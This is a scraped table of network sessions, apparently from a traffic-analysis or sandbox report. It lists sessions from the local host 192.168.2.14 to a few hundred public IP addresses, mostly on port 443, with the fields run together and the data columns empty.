                                                      10264192.168.2.1457270135.162.233.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10265192.168.2.145415481.35.109.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10266192.168.2.143960858.232.30.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10267192.168.2.1445648114.254.244.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10268192.168.2.1458284166.20.164.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10269192.168.2.1451314206.52.98.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10270192.168.2.1437122175.233.216.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10271192.168.2.1442110139.189.24.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10272192.168.2.144688048.81.153.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10273192.168.2.144608892.100.57.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10274192.168.2.145090286.6.251.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10275192.168.2.144789885.154.255.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10276192.168.2.1447774134.74.249.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10277192.168.2.1443146102.54.156.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10278192.168.2.1458326179.54.249.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10279192.168.2.143521684.251.214.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10280192.168.2.144994491.64.5.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10281192.168.2.1449092166.104.139.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10282192.168.2.1440644216.221.183.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10283192.168.2.1440688128.77.169.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10284192.168.2.1452394159.51.231.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10285192.168.2.14420828.197.156.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10286192.168.2.1458584169.147.152.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10287192.168.2.1446384161.230.56.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10288192.168.2.1456544187.162.8.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10289192.168.2.1445118143.248.11.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10290192.168.2.1445130146.196.174.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10291192.168.2.1433480160.92.102.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10292192.168.2.1456684152.130.62.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10293192.168.2.1458528137.166.174.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10294192.168.2.1457878123.233.186.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10295192.168.2.144524435.254.76.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10296192.168.2.1435048207.93.164.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10297192.168.2.14393684.145.171.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10298192.168.2.1458100116.91.213.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10299192.168.2.1440298135.112.93.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10300192.168.2.1460824149.107.249.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10301192.168.2.143375814.152.158.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10302192.168.2.1458544103.201.202.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10303192.168.2.1438178177.223.102.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10304192.168.2.143871660.129.243.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10305192.168.2.144396489.170.11.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10306192.168.2.145766497.99.62.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10307192.168.2.1459924130.230.26.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10308192.168.2.145867664.216.176.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10309192.168.2.145720252.155.81.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10310192.168.2.1442098102.184.146.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10311192.168.2.1440856137.178.170.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10312192.168.2.1456502135.0.119.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10313192.168.2.1460660120.193.219.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10314192.168.2.1433452198.208.252.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10315192.168.2.1446808128.113.132.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10316192.168.2.144659614.18.14.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10317192.168.2.1458450135.238.171.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10318192.168.2.1434730179.179.93.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10319192.168.2.1435650191.255.4.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10320192.168.2.1458928123.175.59.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10321192.168.2.143634245.57.206.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10322192.168.2.1454866113.163.214.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10323192.168.2.1437028102.100.195.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10324192.168.2.145403877.92.94.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10325192.168.2.1437742136.36.108.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10326192.168.2.1441002113.75.248.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10327192.168.2.1449706130.66.55.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10328192.168.2.1441978199.250.28.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10329192.168.2.143761861.62.210.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10330192.168.2.1456158181.47.197.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10331192.168.2.1460302114.226.54.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10332192.168.2.1453674218.250.36.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10333192.168.2.144396849.127.227.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10334192.168.2.1445490176.201.24.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10335192.168.2.145382695.239.87.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10336192.168.2.144809469.64.131.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10337192.168.2.1432958136.243.222.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10338192.168.2.1455762168.250.3.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10339192.168.2.1459718116.178.15.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10340192.168.2.145149825.199.152.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10341192.168.2.143987036.242.90.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10342192.168.2.146038671.180.81.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10343192.168.2.1437806106.94.197.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10344192.168.2.143610482.180.224.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10345192.168.2.1441242185.227.186.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10346192.168.2.144653874.172.237.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10347192.168.2.1433002176.146.206.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10348192.168.2.1454142206.240.240.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10349192.168.2.146087461.89.239.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10350192.168.2.1437608171.57.213.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10351192.168.2.1438510154.174.23.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10352192.168.2.145276232.73.52.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10353192.168.2.145634227.63.238.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10354192.168.2.1435080205.213.109.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10355192.168.2.143689624.252.56.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10356192.168.2.143489652.234.115.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10357192.168.2.1439628149.173.118.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10358192.168.2.144473685.154.168.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10359192.168.2.1459276152.76.111.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10360192.168.2.1449784169.93.78.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10361192.168.2.144605234.149.65.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10362192.168.2.14512244.233.17.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10363192.168.2.145624632.253.233.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10364192.168.2.145993225.20.161.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10365192.168.2.144840827.19.84.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10366192.168.2.143630466.44.135.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10367192.168.2.1442918143.144.155.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10368192.168.2.1457054132.150.224.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10369192.168.2.14438165.95.111.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10370192.168.2.1435318141.58.197.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10371192.168.2.1457276211.155.0.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10372192.168.2.1452500171.5.170.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10373192.168.2.14570108.174.167.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10374192.168.2.1458692189.48.0.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10375192.168.2.145261297.144.22.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10376192.168.2.1451672190.82.168.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10377192.168.2.1459008201.78.19.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10378192.168.2.144118038.122.93.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10379192.168.2.1436218185.218.62.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10380192.168.2.1448396174.189.154.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10381192.168.2.1451248109.198.162.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10382192.168.2.1442054124.253.207.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10383192.168.2.144480478.2.199.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10384192.168.2.1457436220.219.161.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10385192.168.2.144653250.93.163.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10386192.168.2.143960238.202.40.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10387192.168.2.14440209.80.32.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10388192.168.2.145440284.77.122.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10389192.168.2.1442012163.222.162.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10390192.168.2.1451850159.85.173.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10391192.168.2.1437932156.66.3.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10392192.168.2.1445044198.249.200.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10393192.168.2.1441266165.199.185.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10394192.168.2.144074899.239.166.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10395192.168.2.145336635.224.103.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10396192.168.2.1448196207.51.55.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10397192.168.2.1436832202.115.29.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10398192.168.2.1447548218.161.180.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10399192.168.2.1448994188.143.59.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10400192.168.2.1454146130.46.112.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10401192.168.2.1455200125.209.31.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10402192.168.2.1435034151.132.140.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10403192.168.2.1451438125.217.197.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10404192.168.2.1442642139.190.240.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10405192.168.2.1456784109.15.164.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10406192.168.2.144685251.2.85.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10407192.168.2.1435262134.69.36.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10408192.168.2.1444104119.75.208.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10409192.168.2.1449444128.208.131.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10410192.168.2.143851473.196.165.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10411192.168.2.143494075.115.191.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10412192.168.2.145126461.123.32.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10413192.168.2.1439244196.27.223.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10414192.168.2.144980647.48.111.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10415192.168.2.1437150182.1.110.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10416192.168.2.146014436.205.90.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10417192.168.2.144847089.203.92.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10418192.168.2.145674263.52.69.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10419192.168.2.1441640170.163.182.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10420192.168.2.146053499.64.146.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10421192.168.2.1445716204.142.170.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10422192.168.2.144198046.25.227.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10423192.168.2.1458052217.172.82.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10424192.168.2.1457814190.65.11.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10425192.168.2.1454950138.7.78.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10426192.168.2.145278241.50.188.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10427192.168.2.1456282156.242.94.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10428192.168.2.146010483.44.97.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10429192.168.2.144679079.74.221.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10430192.168.2.1456040146.149.58.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10431192.168.2.1439028159.61.224.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10432192.168.2.1441478217.225.168.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10433192.168.2.1444806151.13.160.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10434192.168.2.145363877.183.215.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10435192.168.2.1450298128.129.78.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10436192.168.2.1435610171.109.167.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10437192.168.2.1457062212.132.81.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10438192.168.2.144007052.248.142.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10439192.168.2.1449432128.73.215.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10440192.168.2.1457980197.217.204.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10441192.168.2.144812090.222.50.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10442192.168.2.1450782105.181.85.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10443192.168.2.1445354129.128.82.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10444192.168.2.145643638.161.219.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10445192.168.2.145729639.103.17.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10446192.168.2.1460148188.85.63.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10447192.168.2.143838238.75.15.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10448192.168.2.145281697.125.202.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10449192.168.2.143982878.175.27.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10450192.168.2.1454102180.151.72.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10451192.168.2.1436226155.88.168.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10452192.168.2.1438546118.231.157.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10453192.168.2.1445342109.51.31.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10454192.168.2.144457080.179.45.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10455192.168.2.1439780172.73.249.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10456192.168.2.1439990201.1.137.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10457192.168.2.1457792121.235.233.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10458192.168.2.1458466112.104.193.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10459192.168.2.143946269.231.45.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10460192.168.2.1436500104.19.46.2208080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10461192.168.2.1458366176.55.66.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10462192.168.2.1433936186.102.177.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10463192.168.2.1452340200.146.163.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10464192.168.2.144650823.233.226.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10465192.168.2.1438206203.227.81.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10466192.168.2.1456750161.32.94.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10467192.168.2.1452490165.92.175.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10468192.168.2.1434500212.58.128.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10469192.168.2.1433656203.208.187.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10470192.168.2.1440718171.124.147.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10471192.168.2.145354041.84.106.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10472192.168.2.1453794200.183.175.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10473192.168.2.1456176153.182.205.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10474192.168.2.1447608211.54.137.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10475192.168.2.146093292.20.243.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10476192.168.2.1451416126.220.126.5443
